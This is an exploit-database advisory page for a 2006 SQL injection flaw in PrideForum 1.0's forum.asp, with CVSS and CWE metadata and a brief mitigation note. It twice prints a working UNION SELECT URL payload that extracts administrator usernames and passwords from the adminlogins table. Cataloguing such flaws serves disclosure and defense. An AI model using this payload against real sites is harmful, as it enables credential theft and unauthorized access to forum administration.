header-logo
Suggest Exploit
vendor:
PrideForum 1.0
by:
ajann
7.5
CVSS
HIGH
Remote SQL Injection
89
CWE
Product Name: PrideForum 1.0
Affected Version From: 1
Affected Version To: 1
Patch Exists: N/A
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2006

PrideForum 1.0 (forum.asp) Remote SQL Injection Vulnerability

PrideForum 1.0 is vulnerable to a remote SQL injection vulnerability. An attacker can exploit this vulnerability by sending a maliciously crafted HTTP request to the vulnerable application. An example exploit URL is http://[target]/[path]/forum.asp?H_ID=1%20union+select+0,0,ID,J_User,0,0,0,J_Pass,ID,0+from+adminlogins+where+ID=1&Name=Allm%E4nt

Mitigation:

Input validation should be used to prevent SQL injection attacks. Additionally, the application should be configured to use parameterized queries.
Source

Exploit-DB raw data:

# Title  :   PrideForum 1.0 (forum.asp) Remote SQL Injection Vulnerability
# Author :   ajann

# Exploit Example:
http://[target]/[path]/forum.asp?H_ID=1%20union+select+0,0,ID,J_User,0,0,0,J_Pass,ID,0+from+adminlogins+where+ID=1&Name=Allm%E4nt

# milw0rm.com [2006-05-27]

Navigation

Suggest Exploit

Services By CQR